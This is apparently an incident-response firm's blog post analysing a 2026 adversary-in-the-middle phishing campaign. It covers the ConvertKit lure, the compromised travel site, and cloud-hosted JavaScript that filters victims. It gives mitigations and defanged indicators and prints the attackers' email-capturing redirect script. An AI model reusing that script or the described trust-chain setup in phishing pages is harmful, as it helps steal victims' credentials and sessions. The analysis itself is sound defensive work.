The Invisible Architecture of Modern Phishing

March 11, 2026

tl;dr

Adversary-in-the-Middle (AiTM) in 2026 is less about a single phishing site and more about a trust chain stitched together from legitimate platforms. Recently, we observed:

  • Email marketing platform, ConvertKit is used to send the lure with legitimate sender trust.
  • A compromised long-standing small business site is used as the landing page to borrow reputation.
  • JavaScript hosted on Akamai or Linode Object Storage validates the victim and only then serves the login flow while diverting non-targets elsewhere.

What to do: Prioritize phishing-resistant MFA (e.g., FIDO2, Windows Hello for Business) and tighten Conditional Access (e.g., location/risk signals, app restrictions) to reduce token theft and session replay attacks.

Would your current logs distinguish a legitimate login from a proxied attack?

Verify your security posture with Cloud Insights by Invictus.

Book a Demo

Introduction

Earlier this year, we were alerted by our partners at BIO-ISAC, who brought us into a situation via a third-party organization. What initially appeared to be a standard phishing attempt, the typical BEC-shaped noise you expect on a Friday afternoon, quickly revealed itself to be something more interesting. Once we started pulling the thread, it turned into an example of what AiTM looks like in 2026. 

You’re not fighting a single domain anymore. You’re fighting a trust chain that’s built to look normal, route around controls, and stay alive long after the first block.

Stealing Legitimacy 

It started with a legitimate sender. The email came through ConvertKit, a legitimate email marketing platform, complete with the reputation and authentication signals that make secure email gateways pass it on. Even with AI everywhere these days, the phishing email failed on two counts: it used 'below' incorrectly as an adjective and included an accidental double space. The link provided included the target’s organization and upcoming event, which led to a ‘PDF’ to sign. 

Figure 1 – Phishing lure sample.

The user clicks a ‘Review Document Here’ button and lands not on a fresh phishing domain, but on a real small business site that has been online since 2020; a local Greek travel agency. That’s the point. Domain age based defenses and automated URL scoring tend to relax when the infrastructure looks established. The threat actor didn’t build trust, they hijacked it.

Figure 2 – A fake PDF link leads to a real Greek travel website hosting a phishing page.

Relying on Cloud Scale

Then the invisible layer kicked in. The page loaded a background JavaScript hosted on mainstream cloud and CDN adjacent infrastructure, specifically Akamai and Linode Object Storage. That script wasn’t a simple redirection but it validated the visitor. 

If you were the intended target, it pulled the email from the URL and prefilled the login flow to make it feel seamless and legit. If you entered a non-specified email address then it quietly pushed you to the electronic store, BestBuy. 

Figure 3 – Phishing page and script to check credentials.

Taking Action

This is why AiTM is so prevalent. The face is a legitimate compromised website and the brains sit behind cloud object storage and CDN scale delivery. Blocking the host risks collateral damage. Blocking the domain is slow and temporary because the attacker can hop to the next compromised site in minutes. The chain is designed to outlast your patience and your playbook.

What actually changes the outcome is treating AiTM like a session theft problem:

  1. To prevent AiTM attacks, implement phishing resistant MFA methods using hardware tokens or software passkeys (e.g., FIDO2, Windows Hello for Business). 
  2. Implement strict Conditional Access policies. For example, geofencing logins from countries where your organization is not active (e.g., block logins from Nigeria).
  3. Assume persistence happens quietly, so audit inbox rules and recently deployed OAuth applications because that’s where attackers hide and how they come back.

Victimology

Based on infrastructure analysis, this campaign appears to be largely opportunistic, primarily targeting entities in Canada and the United States. Observed affected sectors include the following:

  • Construction
  • Agriculture
  • Airport & Aircraft Services
  • Industrial Material Suppliers

IOCs

Below is a list of IOCs, which can also be found on our GitHub

Indicator Note
hxxps://[LURE CONTENT].kit.com/8bb3e6198d Phishing link.
gaiostravel[.]gr/[VICTIM NAME] Compromised Greek travel site.
hxxps://chronicleplaque6.us-iad-10.linodeobjects[.]com/encon990.html JavaScript hosted here.
hxxps://servsafepro00.us-mia-1.linodeobjects[.]com/indexi000.html JavaScript hosted here.
hxxps://rush-port0.us-southeast-1.linodeobjects[.]com/index6060.html JavaScript hosted here.
hxxps://filpro.us-lax-1.linodeobjects[.]com/indexer017.html JavaScript hosted here.

Malicious Script

Click to expand and see the malicious script.
/* ===== CONFIG ===== */ const DESTINATION = 'hxxps://servsafepro00.us-mia-1.linodeobjects[.]com/indexi000.html'; const PREFIX = '?'; const REDIRECT_DELAY = 1200; /* ===== ELEMENTS ===== */ const form = document.getElementById('verifyForm'); const emailInput = document.getElementById('email'); const button = document.getElementById('continueBtn'); const loading = document.getElementById('loading'); if (!form || !emailInput || !button || !loading) return; let isSubmitting = false; /* ===== HELPERS ===== */ const isValidEmail = (value) => { return /^[^\s@]+@[^\s@]+\.[^\s@]{2,}$/i.test(value); }; const updateButtonState = () => { const value = emailInput.value.trim(); button.disabled = !value || !isValidEmail(value); }; const lockUI = () => { isSubmitting = true; button.disabled = true; button.style.display = 'none'; loading.style.display = 'block'; }; const redirectUser = (email) => { // intentionally NOT encoded (matches original behavior) window.location.replace(DESTINATION + PREFIX + email); }; /* ===== EVENTS ===== */ emailInput.addEventListener('input', updateButtonState); emailInput.addEventListener('blur', updateButtonState); form.addEventListener('submit', (e) => { e.preventDefault(); if (isSubmitting) return; const email = emailInput.value.trim(); if (!isValidEmail(email)) return; lockUI(); setTimeout(() => redirectUser(email), REDIRECT_DELAY); }); /* ===== INIT ===== */ updateButtonState(); })();

About Invictus Incident Response

We are an incident response company and we ❤️ the cloud and specialize in supporting organizations in preparing and responding to a cyber attack. We help our clients stay undefeated!

🆘 Incident Response support reach out to cert@invictus-ir.com or go to https://www.invictus-ir.com/24-7

More news

24.2.2026

The Silent SaaS Threat: The 5 Questions

Read more
28.1.2026

Incident Response in the Neocloud - Nebius (Part I)

Read more